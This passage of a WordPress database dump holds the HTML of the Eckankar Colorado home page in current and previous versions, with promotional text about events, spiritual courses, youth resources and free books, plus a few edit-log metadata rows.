Sans\" data-font-weight=\"600\" data-font-style=\"\">WHEN YOUR CHILD ASKS ABOUT GOD</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 0px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">HOW WILL YOU ANSWER?</p>\r\n<p class=\"\" style=\"font-size: 17px;\">Children often have profound spiritual experiences. Like many adults, they look for meaning in life and want to know the cause behind all causes.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">The ECK teachings offer spiritual understanding, tools, and insight that can help parents answer their children’s heartfelt questions.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">For more information about local youth activities please contact the <a href=\"https://eckankar-colorado.org/youth-and-family-contact-form/\" rel=\"noopener\">Colorado Youth &amp; Family Director</a></p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.adventuresineckparenting.org/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Explore ECKparents.org<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"color1-background-color color-1-text-contrast bg-background-color tmpl-media-11 boldgrid-section dynamic-gridblock\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 64px; padding-bottom: 20px;\">\r\n<div class=\"col-md-8 col-xs-12 col-sm-8 col-lg-12\">\r\n<h2 class=\"\" style=\"border-width: 0px; font-family: \'Raleway\'; font-weight: 600; color: #697085; text-align: center;\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">Discover More About Eckankar</h2>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"tmpl-text-10 boldgrid-section dynamic-gridblock\" style=\"border-width: 0px;\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 30px; border-width: 0px;\"></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"tmpl-services-10 boldgrid-section dynamic-gridblock bg-background-color color1-background-color color-1-text-contrast\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-4 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"mod-reset\"><img class=\"aligncenter wp-image-269300 size-full bg-img alignnone bg-img-square\" style=\"box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px;\" src=\"https://demo2.cloudwp.dev/trial-22xytvtx/wp-content/uploads/2023/11/meetup-img-1-11-3-2023.jpg\" alt=\"\" width=\"359\" height=\"180\"></p>\r\n</div>\r\n<div class=\"col-lg-4 col-md-6 col-sm-12 col-xs-12\">\r\n<p class=\"\"><img class=\"alignnone wp-image-269326 size-full aligncenter bg-img bg-img-square\" style=\"box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px;\" src=\"https://demo2.cloudwp.dev/trial-22xytvtx/wp-content/uploads/2023/11/newsletter-img-2-11-3-2023.jpg\" alt=\"\" width=\"359\" height=\"180\"></p>\r\n</div>\r\n<div class=\"col-lg-4 col-md-4 col-sm-12 col-xs-12\">\r\n<p class=\"\"><img class=\"bg-img bg-img-square alignnone wp-image-269341 size-full\" style=\"box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px;\" src=\"https://demo2.cloudwp.dev/trial-22xytvtx/wp-content/uploads/2023/11/freebooks-img-5-11-3-2023.jpg\" alt=\"\" width=\"360\" height=\"180\"></p>\r\n</div>\r\n</div>\r\n<div class=\"row\" style=\"padding-top: 3px; padding-bottom: 15px;\">\r\n<div class=\"col-md-4 col-sm-4 col-xs-12 col-lg-4\" style=\"box-shadow: #cecece 0px 0px 0px 0px; border-bottom-right-radius: 0px;\">\r\n<div class=\"row\" style=\"padding-top: 0em; padding-bottom: 15px; border-bottom-left-radius: 0px;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\">\r\n<div style=\"border-top: 7px solid #cd8a0e; background-color: #fbeed0; text-align: center; padding: 15px; box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px; margin-top: -3px;\" class=\"\">\r\n<p class=\"\" style=\"text-align: center; margin: -40px 0px 25px;\">&nbsp;</p>\r\n<p class=\"\" style=\"font-size: 23px; font-weight: 600; text-align: center; color: rgba(62, 62, 62, 0.9);\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">Spiritual Connections</p>\r\n<p class=\"\" style=\"font-size: 17px;\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">The purpose of this Meetup group is to provide a common meeting ground for all who have had, or would like to have, a life-changing spiritual experience.</p>\r\n<p>&nbsp;</p>\r\n<p class=\"\" style=\"text-align: center;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" tabindex=\"0\" href=\"https://www.meetup.com/find/?keywords=eckankar&amp;source=GROUPS&amp;distance=hundredMiles&amp;location=us--co--Denver\" target=\"_blank\" rel=\"noopener\">Join Us On Meetup®</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"col-md-4 col-sm-4 col-xs-12 col-lg-4\">\r\n<div class=\"row\" style=\"padding-top: 0em; padding-bottom: 15px;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\">\r\n<div style=\"border-top: 7px solid #cd8a0e; background-color: #f5f2eb; padding: 15px; box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px; margin-top: -3px;\" class=\"\">\r\n<p class=\"\" style=\"text-align: center; margin: -40px 0px 25px;\">&nbsp;</p>\r\n<p class=\"\" style=\"font-size: 23px; font-family: \'Raleway\'; font-weight: 600; text-align: center; color: rgba(62, 62, 62, 0.9);\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">Get Your Monthly Newsletter!</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 18px; font-weight: 600;\" data-font-weight=\"600\">Delivered right to your email inbox!</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 17px; margin-bottom: 24px;\">Keep up with all the latest news and events from around the state.</p>\r\n<p class=\"\" style=\"text-align: center;\"><a class=\"\" style=\"font-weight: 600;\" href=\"https://eckankar-colorado.org/newsletter-subscription-public/\" data-font-weight=\"600\">(Initiates Subscribe Here)</a></p>\r\n<p class=\"\" style=\"text-align: center;\"><em>&nbsp;</em><a class=\"btn btn-color-1 btn-raised btn-rounded\" tabindex=\"0\" href=\"https://eckankar-colorado.org/newsletter-subscription-public/\"> Public&nbsp;Newsletter Signup</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"col-md-4 col-sm-4 col-xs-12 col-lg-4\">\r\n<div class=\"row\" style=\"padding-top: 0em; padding-bottom: 15px; box-shadow: #cecece 0px 0px 0px 0px inset;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\">\r\n<div style=\"border-top: 7px solid #cd8a0e; background-color: #fbeed0; padding: 15px; box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px; margin-top: -3px;\" class=\"\">\r\n<p class=\"\" style=\"text-align: center; margin: -40px 0px 25px;\">&nbsp;</p>\r\n<p class=\"\" style=\"font-family: \'Raleway\'; font-weight: 600; font-size: 23px; text-align: center; color: rgba(62, 62, 62, 0.9);\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">ECK Books Just For You</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Find out how past lives, dreams, and<br>\r\nSoul Travel help you find God</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">This free-book offer includes two titles:<br>\r\n<strong><em>ECKANKAR—Ancient Wisdom for Today</em></strong> and<br>\r\n<strong><em>Is Life a Random Walk?</em></strong></p>\r\n<p class=\"mod-reset\" style=\"text-align: center;\">&nbsp;</p>\r\n<p class=\"\" style=\"text-align: center;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" href=\"https://www.eckankar.org/freebook/wisdom/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Get Your ECK Books!<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"color-1-text-contrast bg-background-color tmpl-media-7 boldgrid-section dynamic-gridblock\">\r\n<div class=\"container\">\r\n<div class=\"row bg-background-color color1-background-color color-1-text-contrast\" style=\"padding-top: 67px; padding-bottom: 63px; box-shadow: rgba(0, 0, 0, 0.15) 0px 2px 8px; margin-bottom: 25px;\">\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 text-center col-lg-5\" style=\"box-shadow: #cecece 0px 0px 0px 0px inset; padding-right: 0em;\">\r\n<p>[embed] https://www.youtube.com/watch?v=s78XVcM7HWI[/embed]</p>\r\n</div>\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 col-lg-7\">\r\n<h2 class=\"\" style=\"font-family: \'Open Sans\'; font-weight: 600; box-shadow: #cecece 0px 0px 0px 0px inset; margin-top: -12px; color: #cd8a0e; font-size: 19px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Featured eck Video</h2>\r\n<p class=\"\" style=\"font-size: 29px; font-family: \'Open Sans\'; font-weight: 600; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">DO YOU LONG TO KNOW LIFE\'S PURPOSE?</p>\r\n<p class=\"\" style=\"font-size: 17px;\">You are Soul, an eternal, creative being. Unlimited. Divine.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">If you are ready for your next spiritual step, Eckankar’s Advanced Spiritual Living Courses offer a roadmap for your journey home to the heights of Self-Discovery and God-Discovery.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">You don’t need to change your lifestyle to live a rich spiritual life. Enlightenment comes in a natural way from the inside out.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">Ready to get your keys to spiritual transformation?</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>'),(241307,41018,'_message_key','post_updated'),(241308,41018,'_user_id','2'),(241309,41018,'_user_login','S8zhaBda'),(241310,41018,'_user_email','nada@zipnadanot.org'),(241311,41018,'_server_remote_addr','76.130.120.x'),(241312,41018,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?post=7160&action=edit'),(241313,41019,'post_id','7160'),(241314,41019,'post_type','page'),(241315,41019,'post_title','Home'),(241316,41019,'post_prev_post_content','<div style=\"height: 178px; width: 100%; margin-top: -129px; z-index: 1; position: absolute; overflow: hidden;\"><svg viewBox=\"0 0 500 150\" preserveAspectRatio=\"none\" style=\"height: 100%; width: 100%;\"><path d=\"M-3.10,41.93 C187.08,206.73 329.85,-11.33 500.00,49.98 L500.00,150.00 L0.00,150.00 Z\" style=\"stroke: none; fill: #ffffff;\"></path></svg></div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p>&nbsp;</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 80px; border-width: 0px; padding-bottom: 55px;\">\r\n<div class=\"col-lg-1 col-md-12 col-sm-12 col-xs-12\">\r\n<p>&nbsp;</p>\r\n</div>\r\n<div class=\"col-lg-10 col-md-12 col-xs-12 col-sm-12 welcome-card\" style=\"border-width: 0px; background-color: #f8fbf8 !important; z-index: 2; margin-top: -235px;\">\r\n<p class=\"\" style=\"border-width: 0px; margin-left: auto; margin-right: auto; text-align: center; font-family: \'Raleway\'; font-size: 30px; color: #1e63bc; font-weight: 600;\" data-font-style=\"\" data-font-family=\"Raleway\" data-font-weight=\"600\">WELCOME TO ECKANKAR IN COLORADO!</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Does something inside you long to know life’s purpose? To make sense of the world around you?</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">You are Soul, an eternal, creative being. Unlimited. Divine.</p>\r\n<p class=\"\" style=\"font-size: 19px; text-align: center; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Eckankar is an active, individual, creative practice―a companion and road map for your journey home to the heights of Self-Discovery, God-Discovery, and beyond.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Come along and discover the most secret part of yourself.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 21px; color: rgba(61, 61, 61, 0.88); margin-bottom: 2px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><strong>Join us for the events below to discover your life as a spiritual adventure!</strong></p>\r\n</div>\r\n<div class=\"col-lg-1 col-md-12 col-sm-12 col-xs-12\"></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 20px; border-radius: 3px; padding-bottom: -15px;\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"\" style=\"font-size: 35px; color: #666666; text-align: center; font-weight: 600; box-shadow: #cecece 0px 0px 0px 0px inset; margin-bottom: 0px;\" data-font-weight=\"600\">ECK SOUL ADVENTURE EVENTS</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"temp-gridblock-wrapper\"></div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 0px; padding-bottom: 6px;\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\">[MEC id=\"268667\"]</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 23px; padding-bottom: 0px;\">\r\n<div class=\"col-lg-12 col-md-12 col-sm-12 col-xs-12\">\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: Raleway; font-weight: 500; font-size: 33px; color: #697085;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">FOR YOU FROM ECKANKAR</p>\r\n</div>\r\n</div>\r\n<div class=\"row\" style=\"padding-bottom: 30px; padding-top: 10px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 10px 0;\"><img class=\"alignnone size-full wp-image-267648\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/01/hiker-path-1.jpg\" alt=\"\" width=\"744\" height=\"425\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 30px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">SPIRITUAL INSPIRATION</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 1px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">MORE ECK SOUL ADVENTURES</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">What inspires you?</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><a href=\"https://www.eckankar.org/eck-soul-adventure/\">ECKSoulAdventure.org</a> offers dynamic podcasts, compelling spiritual art-work, stories of encounters with the Divine, and so much more.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Explore all the lookout points on the Path of Spiritual Freedom.</p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"http://ECKSoulAdventure.org\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Experience your ECK Soul Adventure now<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\" style=\"border-width: 0px;\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"border-width: 0px; background-image: url(\'https://eckankar-colorado.org/wp-content/uploads/2023/02/teacher-bg.jpg\'); background-size: cover; background-position: 50% 50%;\" data-image-url=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/teacher-bg.jpg\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\" style=\"border-width: 0px; padding: 1em; padding-left: 50px;\">\r\n<p class=\"\" style=\"padding: 1em 0px 0em 0em; border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; color: #cd8a0e; font-size: 19px; margin-top: 1px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">ECK SOUL ADVENTURE GUIDE</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 1px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">SRI HAROLD KLEMP</p>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Spiritual teachers from an ancient lineage walk among us today—Adepts who have mastered the spiritual laws of life, embodying them in thought, word, and deed. Teachers of the highest order.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 17px;\">These are the ECK Masters.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; line-height: 27px; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Chief among them is the Mahanta, the Living ECK Master. As an inner and outer spiritual teacher, his role is to awaken the God-knowledge already within you.<br>\r\n<br>\r\n<a class=\"btn btn-color-1 btn-raised btn-rounded\" href=\"https://www.eckankar.org/eck-master/sri-harold-klemp/\" target=\"_blank\" rel=\"noopener\">Meet Sri Harold<i class=\"arrow right\"></i></a></p>\r\n<p>&nbsp;</p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"mod-reset\" style=\"border-width: 0px; padding-top: 0em;\"><img class=\"aligncenter wp-image-267933 size-full\" style=\"padding-top: 59px;\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/sri-harold-shaking-hands-transp-2.png\" alt=\"\" width=\"450\" height=\"388\"></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 0px; padding-top: 48px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 10px 0px; border-width: 0px;\"><img class=\"alignnone wp-image-267852 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/esc-sun-lensflare-2.jpg\" alt=\"\" width=\"464\" height=\"422\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 43px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">WANT TO GO DEEPER?</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 0px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">ADVANCED SPIRITUAL LIVING COURSES</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">This home-study program from Eckankar is a road map for your journey to Self-Discovery, God-Discovery, and beyond.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Understand the spiritual forces that shape the fabric of your everyday life. Find divine purpose in every moment.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">As Soul, you have the God-knowledge within you!</p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.eckankar.org/engage/advanced-spiritual-living/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Begin Your Journey</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 0px; padding-top: 48px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 4% 0% 2%; border-width: 0px; box-shadow: #cecece 0px 0px 0px 0px inset;\"><img class=\"aligncenter size-full wp-image-249746\" src=\"https://eckankar-colorado.org/wp-content/uploads/2020/01/Youth-in-ECK-sized.jpg\" alt=\"A series of 6 images showing youth in Eckankar\" width=\"555\" height=\"328\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 0px; box-shadow: #cecece 0px 0px 0px 0px inset;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">WHEN YOUR CHILD ASKS ABOUT GOD</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 0px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">HOW WILL YOU ANSWER?</p>\r\n<p class=\"\" style=\"font-size: 17px;\">Children often have profound spiritual experiences. Like many adults, they look for meaning in life and want to know the cause behind all causes.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">The ECK teachings offer spiritual understanding, tools, and insight that can help parents answer their children’s heartfelt questions.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">For more information about local youth activities please contact the <a href=\"https://eckankar-colorado.org/youth-and-family-contact-form/\" rel=\"noopener\">Colorado Youth &amp; Family Director</a></p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.adventuresineckparenting.org/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Explore ECKparents.org<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"color1-background-color color-1-text-contrast bg-background-color tmpl-media-11 boldgrid-section dynamic-gridblock\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 64px; padding-bottom: 20px;\">\r\n<div class=\"col-md-8 col-xs-12 col-sm-8 col-lg-12\">\r\n<h2 class=\"\" style=\"border-width: 0px; font-family: \'Raleway\'; font-weight: 600; color: #697085; text-align: center;\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">Discover More About Eckankar</h2>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"tmpl-text-10 boldgrid-section dynamic-gridblock\" style=\"border-width: 0px;\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 30px; border-width: 0px;\"></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"tmpl-services-10 boldgrid-section dynamic-gridblock bg-background-color color1-background-color color-1-text-contrast\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-4 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"mod-reset\"><img class=\"aligncenter wp-image-269300 size-full bg-img alignnone bg-img-square\" style=\"box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px;\" src=\"https://demo2.cloudwp.dev/trial-22xytvtx/wp-content/uploads/2023/11/meetup-img-1-11-3-2023.jpg\" alt=\"\" width=\"359\" height=\"180\"></p>\r\n</div>\r\n<div class=\"col-lg-4 col-md-6 col-sm-12 col-xs-12\">\r\n<p class=\"\"><img class=\"alignnone wp-image-269326 size-full aligncenter bg-img bg-img-square\" style=\"box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px;\" src=\"https://demo2.cloudwp.dev/trial-22xytvtx/wp-content/uploads/2023/11/newsletter-img-2-11-3-2023.jpg\" alt=\"\" width=\"359\" height=\"180\"></p>\r\n</div>\r\n<div class=\"col-lg-4 col-md-4 col-sm-12 col-xs-12\">\r\n<p class=\"\"><img class=\"bg-img bg-img-square alignnone wp-image-269341 size-full\" style=\"box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px;\" src=\"https://demo2.cloudwp.dev/trial-22xytvtx/wp-content/uploads/2023/11/freebooks-img-5-11-3-2023.jpg\" alt=\"\" width=\"360\" height=\"180\"></p>\r\n</div>\r\n</div>\r\n<div class=\"row\" style=\"padding-top: 3px; padding-bottom: 15px;\">\r\n<div class=\"col-md-4 col-sm-4 col-xs-12 col-lg-4\" style=\"box-shadow: #cecece 0px 0px 0px 0px; border-bottom-right-radius: 0px;\">\r\n<div class=\"row\" style=\"padding-top: 0em; padding-bottom: 15px; border-bottom-left-radius: 0px;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\">\r\n<div style=\"border-top: 7px solid #cd8a0e; background-color: #fbeed0; text-align: center; padding: 15px; box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px; margin-top: -3px;\" class=\"\">\r\n<p class=\"\" style=\"text-align: center; margin: -40px 0px 25px;\">&nbsp;</p>\r\n<p class=\"\" style=\"font-size: 23px; font-weight: 600; text-align: center; color: rgba(62, 62, 62, 0.9);\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">Spiritual Connections</p>\r\n<p class=\"\" style=\"font-size: 15px;\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">The purpose of this Meetup group is to provide a common meeting ground for all who have had, or would like to have, a life-changing spiritual experience.</p>\r\n<p>&nbsp;</p>\r\n<p class=\"\" style=\"text-align: center;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" tabindex=\"0\" href=\"https://www.meetup.com/find/?keywords=eckankar&amp;source=GROUPS&amp;distance=hundredMiles&amp;location=us--co--Denver\" target=\"_blank\" rel=\"noopener\">Join Us On Meetup®</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"col-md-4 col-sm-4 col-xs-12 col-lg-4\">\r\n<div class=\"row\" style=\"padding-top: 0em; padding-bottom: 15px;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\">\r\n<div style=\"border-top: 7px solid #cd8a0e; background-color: #f5f2eb; padding: 15px; box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px; margin-top: -3px;\" class=\"\">\r\n<p class=\"\" style=\"text-align: center; margin: -40px 0px 25px;\">&nbsp;</p>\r\n<p class=\"\" style=\"font-size: 23px; font-family: \'Raleway\'; font-weight: 600; text-align: center; color: rgba(62, 62, 62, 0.9);\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">Get Your Monthly Newsletter!</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 16px; font-weight: 600;\" data-font-weight=\"600\">Delivered right to your email inbox!</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 15px; margin-bottom: 24px;\">Keep up with all the latest news and events from around the state.</p>\r\n<p class=\"\" style=\"text-align: center;\"><a class=\"\" style=\"font-weight: 600;\" href=\"https://eckankar-colorado.org/newsletter-subscription-public/\" data-font-weight=\"600\">(Initiates Subscribe Here)</a></p>\r\n<p class=\"\" style=\"text-align: center;\"><em>&nbsp;</em><a class=\"btn btn-color-1 btn-raised btn-rounded\" tabindex=\"0\" 